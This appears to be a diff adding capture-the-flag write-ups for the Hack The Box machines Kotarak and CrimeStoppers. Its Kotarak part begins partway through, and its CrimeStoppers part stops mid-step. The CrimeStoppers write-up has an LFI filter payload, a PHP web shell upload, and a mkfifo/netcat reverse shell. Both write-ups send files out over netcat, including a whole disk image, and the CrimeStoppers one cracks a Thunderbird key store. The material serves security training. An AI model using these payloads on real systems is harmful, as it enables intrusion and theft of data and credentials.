+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → awk -F: '{print $4}' hashes
+ e64fe0f24ba2489c05e64354d74ebd11
+ 2b576acbe6bcfda7294d6bd18041b8fe
+
+
+
+`  
+
+And we have credentials ! we found the Passwords Password123! and f16tomcat! so let's login as atanas via ssh:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → ssh atanas@10.10.10.55
+ atanas@10.10.10.55's password:
+ Permission denied, please try again.
+ atanas@10.10.10.55's password:
+
+
+
+We can't so we're going to go from our previous reverse shell and su there.
+
+
+
+
+ tomcat@kotarak-dmz:/$
+ tomcat@kotarak-dmz:/$ su - atanas
+ Password: f16tomcat!
+
+
+ atanas@kotarak-dmz:~$ ls -l
+ total 4
+ -rw-rw---- 1 atanas atanas 33 Jul 19 2017 user.txt
+ atanas@kotarak-dmz:~$ cat user.txt
+ 93XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag!
+
+## **Part 3 : Getting Root Access**
+
+To get the root flag we need to first check the groups the user is into:
+
+
+ atanas@kotarak-dmz:~$ id
+ uid=1000(atanas) gid=1000(atanas) groups=1000(atanas),4(adm),6(disk),24(cdrom),30(dip),34(backup),46(plugdev),115(lpadmin),116(sambashare)
+
+ atanas@kotarak-dmz:~$ ps -ef | grep lxc
+ root 914 1 0 Dec21 ? 00:00:00 /usr/bin/lxcfs /var/lib/lxcfs/
+ lxc-dns+ 1381 1 0 Dec21 ? 00:00:00 dnsmasq -u lxc-dnsmasq --strict-order --bind-interfaces --pid-file=/run/lxc/dnsmasq.pid --listen-address 10.0.3.1 --dhcp-range 10.0.3.2,10.0.3.254 --dhcp-lease-max=253 --dhcp-no-override --except-interface=lo --interface=lxcbr0 --dhcp-leasefile=/var/lib/misc/dnsmasq.lxcbr0.leases --dhcp-authoritative
+ root 1413 1 0 Dec21 ? 00:00:00 [lxc monitor] /var/lib/lxc kotarak-int
+ atanas 83412 83387 0 10:29 pts/2 00:00:00 grep --color=auto lxc
+
+
+Here we see something odd, the user atanas is in the disk group, which means that he has access to the drives on this machine. Moreover doing ps -ef we see some lxc processes running, therefore it's safe to assume our next step is to look into the LXC container. But first let's poke around the disks since we should have access to them:
+
+
+ atanas@kotarak-dmz:~$ ls -lash /dev/sd*
+ 0 brw-rw---- 1 root disk 8, 0 Dec 21 11:45 /dev/sda
+ 0 brw-rw---- 1 root disk 8, 1 Dec 21 11:45 /dev/sda1
+ 0 brw-rw---- 1 root disk 8, 2 Dec 21 11:45 /dev/sda2
+ 0 brw-rw---- 1 root disk 8, 5 Dec 21 11:45 /dev/sda5
+
+ atanas@kotarak-dmz:~$ mount | grep root
+ /dev/mapper/Kotarak--vg-root on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+
+
+And here we're hinted at the mounted filesystem Kotarak--vg-root:
+
+
+ atanas@kotarak-dmz:~$ ls -lash /dev/mapper/Kotarak--vg-root
+ 0 lrwxrwxrwx 1 root root 7 Dec 21 11:45 /dev/mapper/Kotarak--vg-root -> ../dm-0
+
+
+
+And here we see that it's a symlink to /dev/dm-0:
+
+
+ atanas@kotarak-dmz:~$ ls -lash /dev/dm-0
+ 0 brw-rw---- 1 root disk 252, 0 Dec 21 11:45 /dev/dm-0
+
+ strings /dev/dm-0
+ ^C
+
+
+running the strings command on dm-0 we see that we can actually read the file, therefore let's send it over to our local machine but first let's check if everything we need is there:
+
+
+ atanas@kotarak-dmz:~$ which dd
+ /bin/dd
+
+ atanas@kotarak-dmz:~$ which nc
+ /bin/nc
+
+ atanas@kotarak-dmz:~$ which gunzip
+ /bin/gunzip
+
+
+
+Looks like it, so we're going to use dd to print out the contents of dm-0 pipe it into gunzip to get rid of the unused 0s and pipe it into netcat to send it back to our machine:
+
+
+ atanas@kotarak-dmz:~$ dd if=/dev/dm-0 | gzip -1 - | nc 10.10.14.6 9095
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Kotarak]
+ → nc -lvnp 9095 > disk.img.gz
+ listening on [any] 9095 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 56702
+
+
+
+using gzip is going to compress the file for us to avoid downloading useless gigabytes filled with 0s
+
+
+
+Wait for it to finish, since the compressed file is 2.2G and then decompress it locally (7.5Gigs)
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ →gunzip disk.img.gz
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → ls -lash disk.img
+ 7.1G -rw-r--r-- 1 nothing nothing 7.0G Dec 22 16:44 disk.img
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → mkdir /mnt/kotarak
+ mkdir: cannot create directory ‘/mnt/kotarak’: Permission denied
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → sudo !!
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → sudo mkdir /mnt/kotarak
+ [sudo] password for nothing:
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → sudo mount disk.img /mnt/kotarak
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
+ → cd /mnt/kotarak
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [/mnt/kotarak]
+ → ls -l
+ total 116
+ drwxr-xr-x 3 root root 4096 Jul 21 2017 backups
+ drwxr-xr-x 2 root root 4096 Jul 10 2017 bin
+ drwxr-xr-x 2 root root 4096 Jul 9 2017 boot
+ drwxr-xr-x 4 root root 4096 Jul 21 2017 dev
+ drwxr-xr-x 105 root root 4096 Jan 18 2018 etc
+ drwxr-xr-x 4 root root 4096 Jul 21 2017 home
+ drwxr-xr-x 24 root root 4096 Jul 21 2017 lib
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 lib32
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 lib64
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 libx32
+ drwx------ 2 root root 16384 Jul 9 2017 lost+found
+ drwxr-xr-x 4 root root 4096 Jul 21 2017 media
+ drwxr-xr-x 2 root root 4096 Jul 19 2016 mnt
+ drwxr-xr-x 4 root root 4096 Jul 21 2017 opt
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 proc
+ drwxrwxrwx 6 root root 4096 Sep 19 2017 root
+ drwxr-xr-x 2 root root 4096 Jul 9 2017 run
+ drwxr-xr-x 2 root root 12288 Jul 21 2017 sbin
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 snap
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 srv
+ drwxr-xr-x 2 root root 4096 Jul 21 2017 sys
+ drwxrwxrwt 10 root root 4096 Dec 22 16:39 tmp
+ drwxr-xr-x 13 root root 4096 Jul 21 2017 usr
+ drwxr-xr-x 15 root root 4096 Jul 21 2017 var
+ lrwxrwxrwx 1 root root 29 Aug 29 2017 vmlinuz -> boot/vmlinuz-4.4.0-87-generic
+ lrwxrwxrwx 1 root root 29 Jul 10 2017 vmlinuz.old -> boot/vmlinuz-4.4.0-83-generic
+
+
+And from here just go to the root directory and print out the root flag:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [/mnt/kotarak]
+ → sudo -i
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [~]
+ → cd /mnt/kotarak/var/lib/lxc/kotarak-int/rootfs/root
+
+ [ 10.10.14.6/23 ] [ /dev/pts/20 ] [kotarak-int/rootfs/root]
+ → cat root.txt
+ 95XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → sudo umount /mnt/kotarak
+
+
+
+And there you have it!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/8.md b/Hard/8.md
new file mode 100644
index 0000000..fcbc292
--- /dev/null
+++ b/Hard/8.md
@@ -0,0 +1,611 @@
+# CrimeStoppers Writeup
+
+
+
+## Introduction :
+
+CrimeStoppers is a hard linux box released back in January 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.80 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.80
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
+ → sudo nmap -sCV -p80 10.10.10.80
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-03 10:21 GMT
+ Nmap scan report for 10.10.10.80
+ Host is up (0.033s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.25 ((Ubuntu))
+ |_http-server-header: Apache/2.4.25 (Ubuntu)
+ |_http-title: FBIs Most Wanted: FSociety
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+we navigate to the upload page:
+
+
+
+And here the fun starts. Let's see if this op parameter contains a LFI:
+
+
+
+So it seems the developer tries to protect against LFI attacks, so let's see if we can poke around that some more using well-known php vulnerability with base64 encryption:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
+ → curl http://10.10.10.80/\?op\=php://filter/convert.base64-encode/resource\=view 2>/dev/null | tail -n21 | head -n1
+ PD9waHAKaW5jbHVkZSAnY29tbW9uLnBocCc7CgppZihlbXB0eSgkX0dFVFsnc2VjcmV0bmFtZSddKSkgewogICAgaGVhZGVyKCdMb2NhdGlvbjogP29wPWhvbWUnKTsKICAgIGV4aXQoKTsKfQoKJHNlY3JldG5hbWUgPSAkX0dFVFsnc2VjcmV0bmFtZSddOwppZiAoJHNlY3JldG5hbWUgPT0gIndoaXRlcm9zZS50eHQiKSB7CgkkdGlwID0gZmlsZV9nZXRfY29udGVudHMoJ3VwbG9hZHMvJyAuIGJhc2VuYW1lKCRzZWNyZXRuYW1lKSk7Cn0gZWxzZSB7CgkkdGlwID0gZmlsZV9nZXRfY29udGVudHMoJ3VwbG9hZHMvJyAuICRfU0VSVkVSWydSRU1PVEVfQUREUiddIC4gJy8nIC4gYmFzZW5hbWUoJHNlY3JldG5hbWUpKTsKfQoKPz4KCjw/cGhwCmVjaG8gIllvdXIgVGlwOjxiciAvPiI7CmVjaG8gaHRtbGVudGl0aWVzKCR0aXApOwo/Pgo8L3NjcmlwdD4K <****/footer>
+
+Then simply pipe it through base64 -d and you get the following results:
+
+
+
+Not much in the view php page above, however on the upload php file we see something interesting:
+
+
+
+
+ if(isset($_POST['submit']) && isset($_POST['tip'])) {
+ // CSRF Token to help ensure this user came from our submission form.
+ if 1 == 1 { //(!empty($_POST['token'])) {
+ if (hash_equals($token, $_POST['token'])) {
+ $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32));
+ // Place tips in the folder of the client IP Address.
+ if (!is_dir('uploads/' . $client_ip)) {
+ mkdir('uploads/' . $client_ip, 0755, false);
+ }
+ $tip = $_POST['tip'];
+ $secretname = genFilename();
+ file_put_contents("uploads/". $client_ip . '/' . $secretname, $tip);
+ header("Location: ?op=view&secretname;=$secretname");
+ } else {
+ print 'Hacker Detected.';
+ print $token;
+ die();
+ }
+ }
+
+
+
+Here we see that the uploaded files are uploaded into **/uploads/ip/** , so we should be able to upload arbitrary data into a file. Moving into the index php page we see something interesting:
+
+
+
+There is a disabled parameter here named 'list' so let's browse to it and see what we get:
+
+
+
+Which reveals us a textfile:
+
+
+
+Which reveals us the parameter "secretname" which most likely designates the filename itself as seen above
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
+ → vim cmd.php
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
+ → cat cmd.php
+ <****?php echo system($_GET['cmd']); ?****>
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
+ → zip shell.zip cmd.php
+ adding: cmd.php (stored 0%)
+
+Now we can use curl to upload to the site. We need the session cookie and the CSRF token, and then we need to follow the redirection (302) location afterward, for debugging purposes we pass it through burpsuite proxy with the **-x 127.0.0.1:8080** as follows:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/HTB/Crimestoppers]
+ → curl -sD - http://10.10.10.80/\?op\=upload -x 127.0.0.1:8080 | grep -e PHPSESSID -e 'name="token"'
+ Set-Cookie: PHPSESSID=kgr3kb7nskn6e2gh6spmtfjfk5; path=/
+ <****input type="text" id="token" name="token" style="display: none" value="16df27a6347c2285cc0dbf5c1525d0f0be26c44cdde404a2fd2c0e90a592ffd6" style="width:355px;" />
+
+Next we use the CSRF token and the session cookie to send the zip file containing our cmd.php payload (btw do it inside bash because there's something zsh doesn't like in it:):
+
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/HTB/Crimestoppers]
+ → bash
+ ┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
+ └─$ curl -X POST -sD - -F "tip=<****shell.zip" -F "name=a" -F "token=16df27a6347c2285cc0dbf5c1525d0f0be26c44cdde404a2fd2c0e90a592ffd6" -F "submit=Send Tip!" -x 127.0.0.1:8080 http://10.10.10.80/\?op\=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=kgr3kb7nskn6e2gh6spmtfjfk5"
+
+` 
+
+We forward the request and we get the location of our file:
+
+
+ ┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
+ └─$ curl -sD - http://10.10.10.80/?op=upload -x 127.0.0.1:8080 | grep -e PHPSESSID -e 'name="token"'
+
+ Set-Cookie: PHPSESSID=cqoq8gg8fqd3cqfl7mflbqfff5; path=/
+ <****input type="text" id="token" name="token" style="display: none" value="74076b162a114837f912f9476baa778842aa1d1385702c88921495bd9d2ccd36" style="width:355px;" />
+
+ ┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
+ └─$ curl -X POST -sD - -F "tip= <****shell.zip" -F "name=a" -F "token=74076b162a114837f912f9476baa778842aa1d1385702c88921495bd9d2ccd36" -F "submit=Send Tip!" -x 127.0.0.1:8080 http://10.10.10.80/\?op\=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=cqoq8gg8fqd3cqfl7mflbqfff5" | grep Location
+
+ Location: ?op=view &secretname;=db0cf33401569e78efe46ec7df40e66a4d1f3252
+
+
+
+now that we have the location **?op=view &secretname;=db0cf33401569e78efe46ec7df40e66a4d1f3252** we can get command execution with the **zip://** filter at **http://10.10.10.80/?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd &cmd;=id**:
+
+
+
+And we have code execution as www-data! Now let's send it over to burpsuite's repeater:
+
+
+
+Now let's see if we can get to the user flag:
+
+ 
+
+And we got the user flag from dom's directory!
+
+## **Part 3 : Getting Root Access**
+
+Before we proceed to privesc let's get a reverse bash shell:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+
+
+ #RAW PAYLOAD
+ GET /?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd;=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 9001 >/tmp/f HTTP/1.1
+
+ #URL ENCODED (SELECT AND CTRL+U)
+ http://10.10.10.80/?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd;=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.11+9001+>/tmp/f
+
+
+
+` 
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.8] from (UNKNOWN) [10.10.10.80] 40832
+ /bin/sh: 0: can't access tty; job control turned off
+ $
+
+
+And we get a reverse shell! Now as usual we spawn a fully interactive TTY:
+
+
+ /bin/sh: 0: can't access tty; job control turned off
+ $ which python python3 wget curl bash sh
+ /usr/bin/python3
+ /usr/bin/wget
+ /bin/bash
+ /bin/sh
+ $ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ www-data@ubuntu:/var/www/html$ ^Z
+ [1] + 429408 suspended nc -lvnp 9001
+
+ [ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
+ → stty raw -echo ; fg
+ [1] + 429408 continued nc -lvnp 9001
+ export TERM=screen-256color
+ www-data@ubuntu:/var/www/html$ export SHELL=bash
+ www-data@ubuntu:/var/www/html$ stty rows 50 columns 200
+ www-data@ubuntu:/var/www/html$ reset
+
+
+
+Now that's done we navigate to dom's home directory to find the .thunderbird hint:
+
+
+ www-data@ubuntu:/var/www/html$ cd /home/dom
+ www-data@ubuntu:/home/dom$ ls -lash
+ total 44K
+ 4.0K drwxr-xr-x 5 dom dom 4.0K Dec 25 2017 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Dec 16 2017 ..
+ 4.0K -rw------- 1 dom dom 52 Dec 16 2017 .Xauthority
+ 4.0K -rw------- 1 dom dom 5 Dec 22 2017 .bash_history
+ 4.0K -rw-r--r-- 1 dom dom 220 Dec 16 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 dom dom 3.7K Dec 16 2017 .bashrc
+ 4.0K drwx------ 2 dom dom 4.0K Dec 16 2017 .cache
+ 4.0K -rw-r--r-- 1 dom dom 675 Dec 16 2017 .profile
+ 4.0K drwx------ 2 dom dom 4.0K Dec 25 2017 .ssh
+ 0 -rw-r--r-- 1 dom dom 0 Dec 16 2017 .sudo_as_admin_successful
+ 4.0K drw-r-xr-x 3 root root 4.0K Dec 16 2017 .thunderbird
+ 4.0K -r--r--r-- 1 root root 33 Jul 9 09:07 user.txt
+
+ www-data@ubuntu:/home/dom$ which nc
+ /bin/nc
+
+
+
+Let's zip it and download it to our box since netcat is already on the box:
+
+
+ [terminal 1]
+ www-data@ubuntu:/home/dom$ zip -r /tmp/thunder.zip .thunderbird/
+
+ www-data@ubuntu:/home/dom$ cd /tmp
+ www-data@ubuntu:/tmp$
+ www-data@ubuntu:/tmp$ ls -l
+ total 408
+ prw-r--r-- 1 www-data www-data 0 Jul 9 10:00 f
+ -rw-r--r-- 1 www-data www-data 414930 Jul 9 09:59 thunder.zip
+ www-data@ubuntu:/tmp$ md5sum thunder.zip
+ 57666b729532e628aac22b2e7d84b21d thunder.zip
+ www-data@ubuntu:/tmp$ cat thunder.zip | nc 10.10.14.8 9999
+
+ [terminal 2]
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → nc -lvnp 9999 > thunder.zip
+ listening on [any] 9999 ...
+ connect to [10.10.14.8] from (UNKNOWN) [10.10.10.80] 49806
+ ^C
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → md5sum thunder.zip
+ 57666b729532e628aac22b2e7d84b21d thunder.zip
+
+
+
+Both hashes match, therefore the file transfer was successful.
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → unzip thunder.zip
+ Archive: thunder.zip
+ creating: .thunderbird/
+ creating: .thunderbird/36jinndk.default/
+ inflating: .thunderbird/36jinndk.default/webappsstore.sqlite
+ inflating: .thunderbird/36jinndk.default/extensions.ini
+ extracting: .thunderbird/36jinndk.default/times.json
+ inflating: .thunderbird/36jinndk.default/blist.sqlite
+ extracting: .thunderbird/36jinndk.default/.parentlock
+ inflating: .thunderbird/36jinndk.default/xulstore.json
+ inflating: .thunderbird/36jinndk.default/formhistory.sqlite
+ inflating: .thunderbird/36jinndk.default/**key3.db**
+
+
+
+As we unzip it, we run **mozilla2john** on the **key3.db** file to then crack it using **john** and rockyou.txt:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → sudo /usr/share/john/mozilla2john.py .thunderbird/36jinndk.default/key3.db
+ key3.db:$mozilla$*3*20*1*811d3b70d608a8ad6faee44bf0568bd77ca8b2ca*11*0000000000000000000000*16*1810e3dcb634e700a4d959e35d38f282*20*11a9519177437ef38aa8bf1966d02f0d9f6a8c2f
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → sudo /usr/share/john/mozilla2john.py .thunderbird/36jinndk.default/key3.db > key3.db.john
+
+ [ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
+ → john -w=/usr/share/wordlists/rockyou.txt key3.db.john --fork=4
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (Mozilla, Mozilla key3.db [SHA1 3DES 32/64])
+ Node numbers 1-4 of 4 (fork)
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ (key3.db)
+ 4 1g 0:00:00:00 DONE (2021-07-09 19:30) 33.33g/s 42666p/s 42666c/s 42666C/s smitty..babygrl
+ 2 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 237479p/s 237479c/s 237479C/s tania.abygurl69
+ 1 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 234069p/s 234069c/s 234069C/s Jakekovac3.ie168
+ Waiting for 3 children to terminate
+ 3 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 230903p/s 230903c/s 230903C/s 0125457423 .a6_123
+ Session completed
+
+
+
+Looks like we have an empty password for our key3.db file so let's install thunderbird to check if this is really an empty password:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/32 ] [~/HTB/Crimestoppers]
+ → sudo apt install thunderbird -y
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~]
+ → cd ~/.thunderbird
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → ls
+ 110d40o6.default 13u77s1u.default-default 'Crash Reports' installs.ini 'Pending Pings' profiles.ini
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → sudo cp -r ~/HTB/Crimestoppers/.thunderbird/36jinndk.default .
+ [sudo] password for nothing:
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → vim profiles.ini
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → cat profiles.ini
+ [Profile1]
+ Name=default
+ IsRelative=1
+ Path=36jinndk.default
+ Default=1
+
+ [InstallFDC34C9F024745EB]
+ Default=13u77s1u.default-default
+ Locked=1
+
+ [Profile0]
+ Name=default-default
+ IsRelative=1
+ Path=13u77s1u.default-default
+
+ [General]
+ StartWithLastProfile=1
+ Version=2
+
+ [ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
+ → thunderbird -ProfileManager
+
+
+
+And after taking a look at dom's emails, we can go into the 'saved passwords' security setting to find her password **Gummer59** so let's get a shell as dom:
+
+
+ www-data@ubuntu:/var/www/html$ su - dom
+ Password: Gummer59
+ dom@ubuntu:~$ id
+ uid=1000(dom) gid=1000(dom) groups=1000(dom),**4(adm)** ,24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
+
+
+
+One interesting thing to note here is that we are part of the **adm** group so we may be able to take a look at the machine's logs. Now that's done let's take a look at her draft emails:
+
+
+ dom@ubuntu:~$ cd .thunderbird/36jinndk.default/ImapMail/crimestoppers.htb/
+ dom@ubuntu:~/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb$ cat Drafts-1
+ From
+ FCC: imap://dom%40crimestoppers.htb@crimestoppers.htb/Sent
+ X-Identity-Key: id1
+ X-Account-Key: account1
+ To: elliot@ecorp.htb
+ From: dom
+ Subject: Potential Rootkit
+ Message-ID: <1f42c857-08fd-1957-8a2d-fa9a4697ffa5@crimestoppers.htb>
+ Date: Sat, 16 Dec 2017 12:53:18 -0800
+ X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
+ attachmentreminder=0; deliveryformat=4
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+ Thunderbird/52.5.0
+ MIME-Version: 1.0
+ Content-Type: text/html; charset=utf-8
+ Content-Language: en-US
+ Content-Transfer-Encoding: 8bit
+
+
+
+
+
+
+ Elliot.
+
+
+
+
+ We got a suspicious email from the DarkArmy claiming there is a
+ Remote Code Execution bug on our Webserver. I don't trust them
+ and ran rkhunter, it reported that there a rootkit installed
+ called: apache_modrootme backdoor.
+
+
+
+
+ According to my research, if this rootkit was on the server I
+ should be able to run "nc localhost 80" and then type get root to
+ get
+
+ nc localhost 80
+
+
+
+
+ get root
+
+
+
+
+
+
+
+
+
+
+
+
+
+ From - Sat Dec 16 12:53:19 2017
+ X-Mozilla-Status: 0001
+ X-Mozilla-Status2: 00000000
+ FCC: imap://dom%40crimestoppers.htb@crimestoppers.htb/Sent
+ X-Identity-Key: id1
+ X-Account-Key: account1
+ To: elliot@ecorp.htb
+ From: dom
+ Subject: Potential Rootkit
+ Message-ID: <1f42c857-08fd-1957-8a2d-fa9a4697ffa5@crimestoppers.htb>
+ Date: Sat, 16 Dec 2017 12:53:18 -0800
+ X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
+ attachmentreminder=0; deliveryformat=4
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+ Thunderbird/52.5.0
+ MIME-Version: 1.0
+ Content-Type: text/html; charset=utf-8
+ Content-Language: en-US
+ Content-Transfer-Encoding: 8bit
+
+
+
+
+
+
+ Elliot.
+
+
+
+
+ We got a suspicious email from the DarkArmy claiming there is a
+ Remote Code Execution bug on our Webserver. I don't trust them
+ and ran rkhunter, it reported that there a rootkit installed
+ called: apache_modrootme backdoor.
+
+
+
+
+ According to my research, if this rootkit was on the server I
+ should be able to run "nc localhost 80" and then type get root to
+ get
+
+ nc localhost 80
+
+
+
+
+ get root
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Now we have a hint towards a certain rootkit/backdoor called **apache_modrootme** , let's run linpeas.sh on the box if it gets picked up:
+
+
+ [terminal 1]
+ [ 10.10.14.8/23 ] [ /dev/pts/14 ] [~/HTB/Crimestoppers]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.8/23 ] [ /dev/pts/14 ] [~/HTB/Crimestoppers]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.10.10.80 - - [10/Jul/2021 13:56:57] "GET /linpeas.sh HTTP/1.1" 200 -
+
+ [terminal 2]
+ dom@ubuntu:~$ wget http://10.10.14.8:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-07-10 05:05:15-- http://10.10.14.8:9090/linpeas.sh
+ Connecting to 10.10.14.8:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[=============================================================================================================>] 333.85K 117KB/s in 2.8s
+
+ 2021-07-10 05:05:19 (117 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ dom@ubuntu:~$ chmod +x /tmp/peas.sh
+ dom@ubuntu:~$ /tmp/peas.sh
+
+
+
+` 
+
+Now we don't necessarily get the modrootme apache string we wanted, but we do get the confirmation that of our suspicion earlier, we are able to read logs of apache2, and chances are, that we may get passwords in here. So let's take a look:
+
+
+
+
+ dom@ubuntu:/var/log/apache2$ zcat access.log.* | grep -v 'OPTIONS\|HEAD\|POST\|GET' | grep ' 400 '
+
+ gzip: access.log.1: not in gzip format
+ ::1 - - [25/Dec/2017:12:59:19 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:00:00 -0800] "FunSociety" 400 0 "-" "-"
+ 127.0.0.1 - - [25/Dec/2017:13:11:04 -0800] "FunSociety" 400 0 "-" "-"
+ 10.10.10.80 - - [25/Dec/2017:13:11:22 -0800] "FunSociety" 400 0 "-" "-"
+ 10.10.10.80 - - [25/Dec/2017:13:11:32 -0800] "42PA" 400 0 "-" "-"
+ 10.10.10.80 - - [25/Dec/2017:13:11:46 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:13:12 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:13:52 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:13:55 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:14:00 -0800] "FunSociety" 400 0 "-" "-"
+ 10.10.14.3 - - [25/Dec/2017:13:14:53 -0800] "FunSociety" 400 0 "-" "-"
+ 10.10.10.80 - - [22/Dec/2017:10:17:17 -0800] "sdf" 400 0 "-" "-"
